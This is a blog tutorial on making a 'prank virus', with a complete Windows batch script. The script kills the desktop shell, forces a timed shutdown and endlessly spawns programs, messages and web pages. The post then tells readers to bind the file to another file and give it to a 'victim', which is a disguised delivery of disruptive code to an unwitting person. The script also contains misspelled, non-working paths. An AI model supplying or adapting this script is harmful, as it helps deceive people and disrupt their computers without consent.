Hacking Gen

Liked us?

Wednesday 22 February 2012

How To Make A Fake Or Prank Virus



What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.
 As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.
  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

    Here I will teach you how to make a prank virus this will freak out your friends or whoever you give it to! They will think that their hard drive is going to be fried.



    Creating The Virus

    1) Open up Notepad in Windows. 
    2) Copy and Paste the Code of the “virus” into Notepad
    3) Click File -> Save as
    4) Decide for a location to save the fake-virus. 
    5) Chose a  filename. Replace the “.txt” at the with “.bat”

    Save files as ''Virus.bat'' or ''Lol.bat'' or with any other name


    6) Click on save and close Notepad.


    Code For Fake Virus

    @echo off
    title Trojan Virus Uploader!
    taskkill /f /im explorer.exe
    cls
    shutdown.exe -s -t 420 -c "Trojan Horse has been Downloaded! Your Computer Is Going To BLAST!"
    cls
    :a
    msg * Trojan Horse has been Downloaded! Your Computer Is Going To Be Destroyed!
    start cmd.exe
    start wab.exe
    start magnify.exe
    start sndrec32.exe
    start sndvol32.exe
    start msmsgs.exe
    start osk.exe
    start utilman.exe
    start moviemk.exe
    start mspaint.exe
    start YahooMessenger.exe
    start mshearts.exe
    start freecell.exe
    start wordpad.exe
    start sol.exe
    start winmine.exe
    start  http://www.google.com
    start http://wowomg.org
    start notepad.exe
    start spider.exe
    start calc.exe
    start PINBALL.EXE
    start iexplorer.exe
    echo C:\Dociments and Settings\Desktop>Trojan Virus!
    echo C:\Dociments and Settings\Desktop>Trojan Virus
    echo C:\Dociments and Settings\Desktop>Worm
    echo C:\Dociments and Settings\Desktop>Worm!
    echo C:\Dociments and Settings\Desktop>Spyware 12
    echo C:\Dociments and Settings\Desktop>Spyware 14
    echo C:\Dociments and Settings\Desktop>Spyware 13
    echo C:\Dociments and Settings\Desktop>Spyware 11
    echo C:\Dociments and Settings\My Computer>Trojan Virus
    echo C:\Dociments and Settings\My Computer>Trojan Virus!
    echo C:\Dociments and Settings\My Computer>Worm
    echo C:\Dociments and Settings\My Computer>Worm!
    echo C:\Dociments and Settings\My Computer>Spyware 12
    echo C:\Dociments and Settings\My Computer>Spyware 14
    echo C:\Dociments and Settings\My Computer>Spyware 13
    echo C:\Dociments and Settings\My Computer>Spyware 11
    loop
    goto :a


    Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File And Give It To Our Victim.

    Binding the ''Virus.bat'' file with any other file.


    Want To Know How To Bind File Then Visit Here

No comments:

Post a Comment

Share

Widgets

Powered By Blogger
Receive Free Updates Via Email. Subscribe Now!